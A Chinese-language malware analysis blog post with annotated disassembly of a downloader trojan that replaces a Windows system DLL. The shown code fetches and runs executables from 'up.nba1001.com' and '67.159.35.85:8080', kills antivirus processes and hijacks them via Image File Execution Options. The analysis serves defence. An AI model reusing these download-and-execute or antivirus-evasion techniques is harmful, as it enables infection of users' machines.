- 003C46F7 >lea eax, dword ptr [ebp-14D8]
- 003C46FD >push eax ; /FileName
- 003C46FE >call dword ptr [<&KERNEL32.LoadLibra>; /LoadLibraryA
- 003C4704 >mov dword ptr [ebp-14E0], eax
- 003C470A >push 003C5680 ; /ProcNameOrOrdinal = "MmGetSystemRoutineAddress"
- 003C470F >push dword ptr [ebp-14E0] ; |hModule
- 003C4715 >call dword ptr [<&KERNEL32.GetProcAd>; /GetProcAddress
- 003C471B >mov ecx, dword ptr [ebp-14DC]
- 003C4721 >sub ecx, dword ptr [ebp-14E0]
- 003C4727 >add eax, ecx
- 003C4729 >mov dword ptr [ebp-4], eax
- 003C472C >push dword ptr [ebp-14E0] ; /hLibModule
- 003C4732 >call dword ptr [<&KERNEL32.FreeLibra>; /FreeLibrary
- 003C4738 >cmp dword ptr [ebp-4], 0
- 003C473C >jnz short 003C4755
- 003C473E >push dword ptr [ebp-10] ; /hObject
- 003C4741 >call dword ptr [<&KERNEL32.CloseHand>; /CloseHandle
- 003C4747 >or dword ptr [ebp-10], FFFFFFFF
- 003C474B >jmp 003C48A2
- 003C4750 >jmp 003C48A2
- 003C4755 >mov eax, dword ptr [ebp-4]
- 003C4758 >mov dword ptr [ebp-1C], eax
- 003C475B >push 0 ; /pOverlapped = NULL
- 003C475D >lea eax, dword ptr [ebp-14] ; |
- 003C4760 >push eax ; |pBytesReturned
- 003C4761 >push 4 ; |OutBufferSize = 4
- 003C4763 >lea eax, dword ptr [ebp-20] ; |
- 003C4766 >push eax ; |OutBuffer
- 003C4767 >push 4 ; |InBufferSize = 4
- 003C4769 >lea eax, dword ptr [ebp-1C] ; |
- 003C476C >push eax ; |InBuffer
- 003C476D >push 222193 ; |IoControlCode = 222193
- 003C4772 >push dword ptr [ebp-10] ; |hDevice
- 003C4775 >call dword ptr [<&KERNEL32.DeviceIoC>; /DeviceIoControl
- 003C477B >cmp dword ptr [3C6054], 0
- 003C4782 >je short 003C47C8
- 003C4784 >mov eax, dword ptr [ebp-1C]
- 003C4787 >cmp eax, dword ptr [ebp-4]
- 003C478A >je short 003C47C8
- 003C478C >cmp dword ptr [ebp-20], 0
- 003C4790 >je short 003C47C8
- 003C4792 >lea eax, dword ptr [ebp-1DA0]
- 003C4798 >push eax
- 003C4799 >push dword ptr [ebp-1C]
- 003C479C >push dword ptr [ebp-20]
- 003C479F >call 003C1151
- 003C47A4 >push 0 ; /pOverlapped = NULL
- 003C47A6 >lea eax, dword ptr [ebp-14] ; |
- 003C47A9 >push eax ; |pBytesReturned
- 003C47AA >push 8C0 ; |OutBufferSize = 8C0 (2240.)
- 003C47AF >lea eax, dword ptr [ebp-1DA0] ; |
- 003C47B5 >push eax ; |OutBuffer
- 003C47B6 >push 0 ; |InBufferSize = 0
- 003C47B8 >push 0 ; |InBuffer = NULL
- 003C47BA >push 22221F ; |IoControlCode = 22221F
- 003C47BF >push dword ptr [ebp-10] ; |hDevice
- 003C47C2 >call dword ptr [<&KERNEL32.DeviceIoC>; /DeviceIoControl
- 003C47C8 >mov dword ptr [ebp-8], 003C6350
- 003C47CF >mov eax, dword ptr [ebp-8]
- 003C47D2 >movsx eax, byte ptr [eax]
- 003C47D5 >test eax, eax
- 003C47D7 >je 003C489A
- 003C47DD >push 400 ; /n = 400 (1024.)
- 003C47E2 >push 0 ; |c = 00
- 003C47E4 >lea eax, dword ptr [ebp-F40] ; |
- 003C47EA >push eax ; |s
- 003C47EB >call <jmp.&MSVCRT.memset> ; /memset
- 003C47F0 >add esp, 0C
- 003C47F3 >push dword ptr [ebp-8] ; /<%s>
- 003C47F6 >push dword ptr [3C6008] ; |<%s> = "SOFTWARE/Microsoft/Windows NT/CurrentVersion/Image File Execution Options"
- 003C47FC >push dword ptr [3C6000] ; |<%s> = "/Registry/Machine"
- 003C4802 >push 003C569C ; |Format = "%s/%s/%s"
- 003C4807 >lea eax, dword ptr [ebp-F40] ; |
- 003C480D >push eax ; |s
- 003C480E >call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA
- 003C4814 >add esp, 14
- 003C4817 >lea eax, dword ptr [ebp-F40]
- 003C481D >push eax ; /String
- 003C481E >call dword ptr [<&KERNEL32.lstrlenA>>; /lstrlenA
- 003C4824 >mov dword ptr [ebp-18], eax
- 003C4827 >push 800 ; /n = 800 (2048.)
- 003C482C >push 0 ; |c = 00
- 003C482E >lea eax, dword ptr [ebp-820] ; |
- 003C4834 >push eax ; |s
- 003C4835 >call <jmp.&MSVCRT.memset> ; /memset
- 003C483A >add esp, 0C
- 003C483D >push dword ptr [ebp-18] ; /WideBufSize
- 003C4840 >lea eax, dword ptr [ebp-820] ; |
- 003C4846 >push eax ; |WideCharBuf
- 003C4847 >push dword ptr [ebp-18] ; |StringSize
- 003C484A >lea eax, dword ptr [ebp-F40] ; |
- 003C4850 >push eax ; |StringToMap
- 003C4851 >push 0 ; |Options = 0
- 003C4853 >push 0 ; |CodePage = CP_ACP
- 003C4855 >call dword ptr [<&KERNEL32.MultiByte>; /MultiByteToWideChar
- 003C485B >push 0 ; /pOverlapped = NULL
- 003C485D >lea eax, dword ptr [ebp-14] ; |
- 003C4860 >push eax ; |pBytesReturned
- 003C4861 >push 0 ; |OutBufferSize = 0
- 003C4863 >push 0 ; |OutBuffer = NULL
- 003C4865 >mov eax, dword ptr [ebp-18] ; |
- 003C4868 >lea eax, dword ptr [eax+eax+2] ; |
- 003C486C >push eax ; |InBufferSize
- 003C486D >lea eax, dword ptr [ebp-820] ; |
- 003C4873 >push eax ; |InBuffer
- 003C4874 >push 22245C ; |IoControlCode = 22245C
- 003C4879 >push dword ptr [ebp-10] ; |hDevice
- 003C487C >call dword ptr [<&KERNEL32.DeviceIoC>; /DeviceIoControl
- 003C4882 >push dword ptr [ebp-8] ; /String
- 003C4885 >call dword ptr [<&KERNEL32.lstrlenA>>; /lstrlenA
- 003C488B >mov ecx, dword ptr [ebp-8]
- 003C488E >lea eax, dword ptr [ecx+eax+1]
- 003C4892 >mov dword ptr [ebp-8], eax
- 003C4895 >jmp 003C47CF
- 003C489A >push dword ptr [ebp-10]
- 003C489D >call 003C42BA
- 003C48A2 >push 0 ; /pThreadId = NULL
- 003C48A4 >push 0 ; |CreationFlags = 0
- 003C48A6 >push 0 ; |pThreadParm = NULL
- 003C48A8 >push 003C27B7 ; |ThreadFunction = appmgmts.003C27B7
- 003C48AD >push 0 ; |StackSize = 0
- 003C48AF >push 0 ; |pSecurity = NULL
- 003C48B1 >call dword ptr [<&KERNEL32.CreateThr>; /CreateThread 创建线程2
- 003C48B7 >cmp dword ptr [ebp-10], -1
- 003C48BB >je short 003C48D7
- 003C48BD >xor eax, eax
- 003C48BF >inc eax
- 003C48C0 >je short 003C48D7
- 003C48C2 >push dword ptr [ebp-10]
- 003C48C5 >call 003C42BA 不断循环检测服务是否启动,如果服务被关闭,则启动。并对绝大多数杀毒软件作镜像劫持
- 003C48CA >push 5DC
- 003C48CF >call dword ptr [ebp-92C] sleep函数
- 003C48D5 >jmp short 003C48BD
- 003C48D7 >xor eax, eax
- 003C48D9 >leave
- 003C48DA >retn 4
复制代码
总体流程结束
------------------------------------------------------------------
进入线程 2,代码如下:
- 003C27B7 >push ebp
- 003C27B8 >mov ebp, esp
- 003C27BA >sub esp, 90
- 003C27C0 >and dword ptr [ebp-20], 0
- 003C27C4 >and dword ptr [ebp-1C], 0
- 003C27C8 >and dword ptr [ebp-14], 0
- 003C27CC >and dword ptr [ebp-C], 0
- 003C27D0 >and dword ptr [ebp-18], 0
- 003C27D4 >and dword ptr [ebp-8], 0
- 003C27D8 >and dword ptr [ebp-64], 0
- 003C27DC >and dword ptr [ebp-10], 0
- 003C27E0 >and dword ptr [ebp-4], 0
- 003C27E4 >push 003C5474 ; /FileName = "urlmon.dll" 加载urlmon.dll模块
- 003C27E9 >call dword ptr [<&KERNEL32.LoadLibra>; /LoadLibraryA
- 003C27EF >mov dword ptr [ebp-64], eax
- 003C27F2 >push 003C5480 ; /ProcNameOrOrdinal = "URLDownloadToFileA" 获取该函数地址
- 003C27F7 >push dword ptr [ebp-64] ; |hModule
- 003C27FA >call dword ptr [<&KERNEL32.GetProcAd>; /GetProcAddress
- 003C2800 >mov dword ptr [3C7584], eax
- 003C2805 >push 003C5494 ; /FileName = "Wininet.dll"
- 003C280A >call dword ptr [<&KERNEL32.LoadLibra>; /LoadLibraryA
- 003C2810 >mov dword ptr [ebp-10], eax
- 003C2813 >push 003C54A0 ; /ProcNameOrOrdinal = "GetUrlCacheEntryInfoA"
- 003C2818 >push dword ptr [ebp-10] ; |hModule
- 003C281B >call dword ptr [<&KERNEL32.GetProcAd>; /GetProcAddress
- 003C2821 >mov dword ptr [ebp-4], eax
- 003C2824 >push 0
- 003C2826 >push dword ptr [3C600C]
- 003C282C >push 200
- 003C2831 >push 003C6058 ; ASCII "up.nba1001.com"
- 003C2836 >call <enstr> 字符处理函数
- 003C283B >push 0
- 003C283D >push dword ptr [3C600C]
- 003C2843 >push 30
- 003C2845 >push 003C625C ; ASCII "down"
- 003C284A >call <enstr>
- 003C284F >push 0
- 003C2851 >push dword ptr [3C600C]
- 003C2857 >push 5C
- 003C2859 >push 003C6290 ; UNICODE "02"
- 003C285E >call <enstr>
- 003C2863 >call 003C2742
- 003C2868 >push 003C54B8 ; ASCII "Explorer.exe"
- 003C286D >call <KillPro> 关闭Explorer.exe进程
- 003C2872 >mov dword ptr [ebp-C], eax
- 003C2875 >cmp dword ptr [ebp-C], 0
- 003C2879 >je short 003C28AD
- 003C287B >and dword ptr [ebp-68], 0
- 003C287F >push dword ptr [ebp-C] ; /ProcessId
- 003C2882 >push 0 ; |Inheritable = FALSE
- 003C2884 >push 400 ; |Access = QUERY_INFORMATION
- 003C2889 >call dword ptr [<&KERNEL32.OpenProce>; /OpenProcess
- 003C288F >mov dword ptr [ebp-68], eax
- 003C2892 >lea eax, dword ptr [ebp-8]
- 003C2895 >push eax ; /phToken
- 003C2896 >push 0F01FF ; |DesiredAccess = STANDARD_RIGHTS_REQUIRED|TOKEN_ASSIGN_PRIMARY|TOKEN_DUPLICATE|TOKEN_IMPERSONATE|TOKEN_QUERY|TOKEN_QUERY_SOURCE|TOKEN_ADJUST_PRIVILEGES|TOKEN_ADJUST_GROUPS|TOKEN_ADJUST_DEFAULT|100
- 003C289B >push dword ptr [ebp-68] ; |hProcess
- 003C289E >call dword ptr [<&ADVAPI32.OpenProce>; /OpenProcessToken
- 003C28A4 >push dword ptr [ebp-68] ; /hObject
- 003C28A7 >call dword ptr [<&KERNEL32.CloseHand>; /CloseHandle
- 003C28AD >mov dword ptr [ebp-20], 003C6290
- 003C28B4 >xor eax, eax
- 003C28B6 >inc eax
- 003C28B7 >je 003C2B2C
- 003C28BD >mov dword ptr [ebp-6C], 1
- 003C28C4 >push 40 ; /n = 40 (64.)
- 003C28C6 >push 0 ; |c = 00
- 003C28C8 >lea eax, dword ptr [ebp-60] ; |
- 003C28CB >push eax ; |s
- 003C28CC >call <jmp.&MSVCRT.memset> ; /memset
- 003C28D1 >add esp, 0C
- 003C28D4 >push 0
- 003C28D6 >push 40
- 003C28D8 >lea eax, dword ptr [ebp-60]
- 003C28DB >push eax
- 003C28DC >lea eax, dword ptr [ebp-14]
- 003C28DF >push eax
- 003C28E0 >lea eax, dword ptr [ebp-1C]
- 003C28E3 >push eax
- 003C28E4 >push 003C6058
- 003C28E9 >call 003C22F0 关键call 3,查看网络连接
- 003C28EE >test eax, eax
- 003C28F0 >jnz short 003C28F7
- 003C28F2 >jmp 003C2B2C
- 003C28F7 >mov eax, dword ptr [ebp-20]
- 003C28FA >movsx eax, byte ptr [eax]
- 003C28FD >test eax, eax
- 003C28FF >je 003C2B1F
- 003C2905 >and dword ptr [ebp-70], 0
- 003C2909 >push 400 ; /n = 400 (1024.)
- 003C290E >push 0 ; |c = 00
- 003C2910 >push 003C6E60 ; |s = appmgmts.003C6E60
- 003C2915 >call <jmp.&MSVCRT.memset> ; /memset
- 003C291A >add esp, 0C
- 003C291D >push 104 ; /n = 104 (260.)
- 003C2922 >push 0 ; |c = 00
- 003C2924 >push 003C7260 ; |s = appmgmts.003C7260
- 003C2929 >call <jmp.&MSVCRT.memset> ; /memset
- 003C292E >add esp, 0C
- 003C2931 >push dword ptr [ebp-20] ; /<%s>
- 003C2934 >push 003C625C ; |<%s> = "?掫h?
- 003C2939 >push dword ptr [3C6050] ; |<%d> = 1F90 (8080.)
- 003C293F >lea eax, dword ptr [ebp-60] ; |
- 003C2942 >push eax ; |<%s>
- 003C2943 >push 003C54C8 ; |Format = "http://%s:%d/%s/%s.exe"
- 003C2948 >push 003C6E60 ; |s = appmgmts.003C6E60
- 003C294D >call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA 字符连接,得到下载链接
- 003C2953 >add esp, 18
- 003C2956 >call 003C176E 获得一个随机数字串
- 003C295B >push eax ; /<%d>
- 003C295C >push dword ptr [ebp-20] ; |<%s>
- 003C295F >push 003C7368 ; |<%s> = "C:/DOCUME~1/safe/LOCALS~1/Temp/"
- 003C2964 >push 003C54E0 ; |Format = "%s%s%d.exe"
- 003C2969 >push 003C7260 ; |s = appmgmts.003C7260
- 003C296E >call dword ptr [<&USER32.wsprintfA>] ; /wsprintfA 字符连接,得到下载到本地临时目录的文件名,本机是C:/LOCALS~1/Temp/01139.exe
- 003C2974 >add esp, 14
- 003C2977 >and dword ptr [ebp-74], 0
- 003C297B >jmp short 003C2984
- 003C297D >mov eax, dword ptr [ebp-74]
- 003C2980 >inc eax
- 003C2981 >mov dword ptr [ebp-74], eax
- 003C2984 >cmp dword ptr [ebp-74], 2
- 003C2988 >jge 003C2AE1
- 003C298E >and dword ptr [ebp-7C], 0
- 003C2992 >and dword ptr [ebp-80], 0
- 003C2996 >and dword ptr [ebp-78], 0
- 003C299A >push 0 ; /pThreadId = NULL
- 003C299C >push 0 ; |CreationFlags = 0
- 003C299E >push 0 ; |pThreadParm = NULL
- 003C29A0 >push 003C278F ; |ThreadFunction = appmgmts.003C278F
- 003C29A5 >push 0 ; |StackSize = 0
- 003C29A7 >push 0 ; |pSecurity = NULL
- 003C29A9 >call dword ptr [<&KERNEL32.CreateThr>; /CreateThread 创建线程3,下载病毒文件到临时目录。
- 003C29AF >mov dword ptr [ebp-80], eax
- 003C29B2 >push 1F40 ; /Timeout = 8000. ms
- 003C29B7 >push dword ptr [ebp-80] ; |hObject
- 003C29BA >call dword ptr [<&KERNEL32.WaitForSi>; /WaitForSingleObject
- 003C29C0 >mov dword ptr [ebp-78], eax
- 003C29C3 >cmp dword ptr [ebp-78], 102
- 003C29CA >jnz short 003C29D7
- 003C29CC >push 1 ; /ExitCode = 1
- 003C29CE >push dword ptr [ebp-80] ; |hThread
- 003C29D1 >call dword ptr [<&KERNEL32.Terminate>; /TerminateThread
- 003C29D7 >lea eax, dword ptr [ebp-7C]
- 003C29DA >push eax ; /pExitCode
- 003C29DB >push dword ptr [ebp-80] ; |hThread
- 003C29DE >call dword ptr [<&KERNEL32.GetExitCo>; /GetExitCodeThread
- 003C29E4 >push dword ptr [ebp-80] ; /hObject
- 003C29E7 >call dword ptr [<&KERNEL32.CloseHand>; /CloseHandle
- 003C29ED >cmp dword ptr [ebp-7C], 0
- 003C29F1 >jnz 003C2AB8
- 003C29F7 >and dword ptr [ebp-84], 0
- 003C29FE >lea eax, dword ptr [ebp-84]
- 003C2A04 >push eax
- 003C2A05 >push 0
- 003C2A07 >push 003C6E60
- 003C2A0C >call dword ptr [ebp-4]
- 003C2A0F >cmp dword ptr [ebp-84], 0
- 003C2A16 >je short 003C2A7B
- 003C2A18 >push dword ptr [ebp-84]
- 003C2A1E >call <jmp.&MSVCRT.operator new>
- 003C2A23 >pop ecx
- 003C2A24 >mov dword ptr [ebp-8C], eax
- 003C2A2A >mov eax, dword ptr [ebp-8C]
- 003C2A30 >mov dword ptr [ebp-88], eax
- 003C2A36 >lea eax, dword ptr [ebp-84]
- 003C2A3C >push eax
- 003C2A3D >push dword ptr [ebp-88]
- 003C2A43 >push 003C6E60
- 003C2A48 >call dword ptr [ebp-4]
- 003C2A4B >mov eax, dword ptr [ebp-88]
- 003C2A51 >push dword ptr [eax+8] ; /FileName
- 003C2A54 >call dword ptr [<&KERNEL32.DeleteFil>; /DeleteFileA
- 003C2A5A >cmp dword ptr [ebp-88], 0
- 003C2A61 >je short 003C2A7B
- 003C2A63 >mov eax, dword ptr [ebp-88]
- 003C2A69 >mov dword ptr [ebp-90], eax
- 003C2A6F >push dword ptr [ebp-90]
- 003C2A75 >call <jmp.&MSVCRT.operator delete>
- 003C2A7A >pop ecx
- 003C2A7B >push 003C7260
- 003C2A80 >call 003C26DA 创建C:/LOCALS~1/Temp/01139.exe文件
- 003C2A85 >cmp eax, 1
- 003C2A88 >jnz short 003C2AA6
- 003C2A8A >and dword ptr [ebp-18], 0
- 003C2A8E >mov dword ptr [ebp-70], 1
- 003C2A95 >push dword ptr [ebp-8]
- 003C2A98 >push 003C7260
- 003C2A9D >call 003C25F4 执行下载回来的文件01139.exe
- 003C2AA2 >jmp short 003C2AE1
- 003C2AA4 >jmp short 003C2AB8
- 003C2AA6 >mov eax, dword ptr [ebp-18]
- 003C2AA9 >inc eax
- 003C2AAA >mov dword ptr [ebp-18], eax
- 003C2AAD >push 003C7260 ; /FileName = ""
- 003C2AB2 >call dword ptr [<&KERNEL32.DeleteFil>; /DeleteFileA 删除C:/LOCALS~1/Temp/01139.exe文件
- 003C2AB8 >cmp dword ptr [ebp-7C], 800C0006
- 003C2ABF >jnz short 003C2AD1
- 003C2AC1 >mov dword ptr [ebp-70], 1
- 003C2AC8 >mov eax, dword ptr [ebp-18]
- 003C2ACB >inc eax
- 003C2ACC >mov dword ptr [ebp-18], eax
- 003C2ACF >jmp short 003C2AE1
- 003C2AD1 >push 0BB8 ; /Timeout = 3000. ms
- 003C2AD6 >call dword ptr [<&KERNEL32.Sleep>] ; /Sleep
- 003C2ADC >jmp 003C297D
- 003C2AE1 >cmp dword ptr [ebp-18], 3
- 003C2AE5 >jb short 003C2AF0
- 003C2AE7 >mov dword ptr [ebp-6C], 1
- 003C2AEE >jmp short 003C2B1F
- 003C2AF0 >cmp dword ptr [ebp-70], 0
- 003C2AF4 >jnz short 003C2AFC
- 003C2AF6 >and dword ptr [ebp-6C], 0
- 003C2AFA >jmp short 003C2B1F
- 003C2AFC >push dword ptr [ebp-20] ; /String
- 003C2AFF >call dword ptr [<&KERNEL32.lstrlenA>>; /lstrlenA
- 003C2B05 >mov ecx, dword ptr [ebp-20]
- 003C2B08 >lea eax, dword ptr [ecx+eax+1]
- 003C2B0C >mov dword ptr [ebp-20], eax
- 003C2B0F >push 1F40 ; /Timeout = 8000. ms
- 003C2B14 >call dword ptr [<&KERNEL32.Sleep>] ; /Sleep
- 003C2B1A >jmp 003C28F7
- 003C2B1F >cmp dword ptr [ebp-6C], 1
- 003C2B23 >jnz short 003C2B27
- 003C2B25 >jmp short 003C2B2C
- 003C2B27 >jmp 003C28B4
- 003C2B2C >push dword ptr [ebp-64] ; /hLibModule
- 003C2B2F >call dword ptr [<&KERNEL32.FreeLibra>; /FreeLibrary
- 003C2B35 >xor eax, eax
- 003C2B37 >leave
- 003C2B38 >retn 4
复制代码
-----------------
进入线程3,代码如下:
- 003C278F />push ebp
- 003C2790 |>mov ebp, esp
- 003C2792 |>push ecx
- 003C2793 |>and [local.1], 0
- 003C2797 |>push 0
- 003C2799 |>push 0
- 003C279B |>push 003C7260 ; ASCII "C:/DOCUME~1/safe/LOCALS~1/Temp/01139.exe"
- 003C27A0 |>push 003C6E60 ; ASCII "http://67.159.35.85:8080/down/0.exe"
- 003C27A5 |>push 0
- 003C27A7 |>call dword ptr [3C7584] ; urlmon.URLDownloadToFileA
- 003C27AD |>mov [local.1], eax
- 003C27B0 |>mov eax, [local.1]
- 003C27B3 |>leave
- 003C27B4 />retn 4
复制代码
总结下流程:
1,比较模块基址和3C0000h,用于判断自身是exe还是dll文件。
2,是exe,创建C:/IOSYS.ini配置文件,加载sfc.dll,获得去除文件保护属性的导出函数地址,感染C:/WINDOWS/system32/appmgmts.dll,
qmgr.dll,检查文件appmgmts.dll是否存在,若不存在,则创建C:/System32/appmgmts.dll。若找到appmgmts.dll,则去掉该文件保护属性,
释放病毒动态链接库并命名为appmgmts.dll,替换系统正常文件%SystemRoot%/System32/appmgmts.dll。并替换文件
C:/system32/dllcache/appmgmts.dll.
3,启动"AppMgmt"服务,通过该服务加载C:/System32/appmgmts.dll。
4,读取C:/IOSYS.ini配置文件病毒路径,删除病毒主体。
5,创建线程,创建一个名为Accopt的服务,并加载。检测进程avp.exe等安全软件是否存在,如果找到,将其终止,并恢复SSDT。
6,创建线程,访问目标网址,下载大量病毒到本地运行。
7,不断循环检测服务是否启动,如果服务被关闭,则启动。并对绝大多数杀毒软件作镜像劫持。
可爱的结束符
下载者DownLoader.Win32.Undef分析相关推荐
- 遭遇Windows Update.exe/Trojan.Win32.Autoit.fc,情se发布器.exe/AdWare.Win32.Undef.eko
遭遇Windows Update.exe/Trojan.Win32.Autoit.fc,情se发布器.exe/AdWare.Win32.Undef.eko endurer 原创 2009-05-19 ...
- 遭遇 kupqytu.dll/Trojan.Win32.Undef.fzq,kmwprnp.dll/Trojan.Win32.Agent.lmo 等1
遭遇 kupqytu.dll/Trojan.Win32.Undef.fzq,kmwprnp.dll/Trojan.Win32.Agent.lmo 等1 endurer 原创 2008-06-03 第1 ...
- 淘宝店铺装修教程之下载淘宝视频及分析视频地址中的高逼格信息
摘要: 关于淘宝视频方面的教程,艺灵已写过好几篇了,唯独没有下载的教程,然后群内小伙伴也一直问这个问题,所以特写此教程,内含信息量巨大,看官慎入...... 一.起因 还是因为刚有群友在群里问这个问题 ...
- BT和eMule下载协议的比较和分析
转载:http://www.yuanma.org/data/2008/0420/article_3009.htmBT和eMule下载协议的比较和分析 由于从事P2P下载引擎开发得原因,对BT和 ...
- Localspace Viewer下载影像并进行地形分析
Localspace Viewer下载影像并进行地形分析 1 准备遥感影像 在Localspace Viewer中,下载遥感影像,在Arcgis中加载如下: 2 获取等高线信息 在Localspace ...
- 【Android 逆向】GDA 逆向工具安装 ( GDA 下载 | GDA 简介 | 运行 GDA 分析 APK 文件 )
文章目录 一.GDA 相关资料 二.运行 GDA 分析 APK 文件 一.GDA 相关资料 GDA 相关资料 : GDA 工具官网 : http://www.gda.wiki:9090 GDA 文档 ...
- nexbox本地网络调试工具下载_「下载」 Windows 10 WinDBG 分析转储日志和蓝屏日志排查错误原因...
使用Windows 10相对来说出现蓝屏概率还是很高的,但微软提供的错误代码有时候可能无法帮助我们解决问题. 所以我们需要使用更专业的工具来分析系统记录的日志,有日志进行排查后就可以定位到具体什么原因 ...
- HTTP下载文件校验失败原因分析与解决
从7月中旬左右,我们客户端更新失败率由原来的2%上升到10%.更新后台数据统计显示更新失败中的90%为HTTP下载失败,具体的失败原因是文件下载完成后MD5与服务器预期的MD5不匹配. 在着手调查解决 ...
- [搜片神器]BT种子下载超时很多的问题分析
继续接着第一篇写:使用C#实现DHT磁力搜索的BT种子后端管理程序+数据库设计(开源)[搜片神器] 谢谢园子朋友的支持,已经找到个VPS进行测试,国外的服务器: h31bt.org 大家可以给提点意 ...
最新文章
- 机器学习项目模板:ML项目的6个基本步骤
- 使用PyCharm创建Django项目及基本配置
- 华为第四代服务器芯片Hi1620,华为第四代自研芯片Hi1620曝光, 全球首款7nm的ARM处理器...
- 两线怎么接三线插座图_水温传感器怎么判断好坏
- 《浅谈架构之路:前后端分离模式》 - 山人行 - 博客园
- Java组合实体模式~
- [测试模式]Setup方法的滥用
- JBPM开发入门指南(3)
- 自动化机器人 rpa_机器人过程自动化和机器人的出现
- Syslog日志中心服务器收集windows和linux客户端日志
- android studio更改代码字体,Android Studio怎么改变代码字体大小?
- 小米刷原生android系统下载地址,小米6刷原生安卓8.0下载|小米6刷原生安卓p 免费版_附教程_最火软件站...
- web服务器集群-------Apache网页优化 (1)网页压缩
- 计算机的组策略在什么地方,WINDOWS的常用组策略
- 如何通过Python进行图片批量下载?
- mousedown mouseup click 触发顺序
- 基于双TMS320C6678 DSP的3U VPX的信号处理平台18 3U VPX信号处理 C6678板卡 C6678开发板 C6678处理板 C6678信号处理板
- 电信流失客户特征分析及预测
- threejs加载3D模型
- 微信浏览器不支持下载文件或应用解决方案--跳转到默认浏览器打开
热门文章
- 横向合计代码 锐浪报表_锐浪报表/Grid++Report/V5.8/6.0非常好注册正式版
- 如何测试代理IP的质量?
- 控制台 -网络管理之DHCP地址租约过程
- 网络之IP地址规划小技巧分享(秘)
- 观大数据有感_《大数据时代》读后感范文(精选8篇)
- Jsp+Servlet基础
- java如何实现计费软件_基于jsp的网吧自动计费收费管理系统-JavaEE实现网吧自动计费收费管理系统 - java项目源码...
- 用内存断点找OEP 问题 脱壳时提示无法读取被调试进程的内存 bad dos signature
- html的hsl形式的颜色选择器,简单的HSL颜色选择器/拾色器
- 硬盘-磁盘-分区-格式化-lvm-raid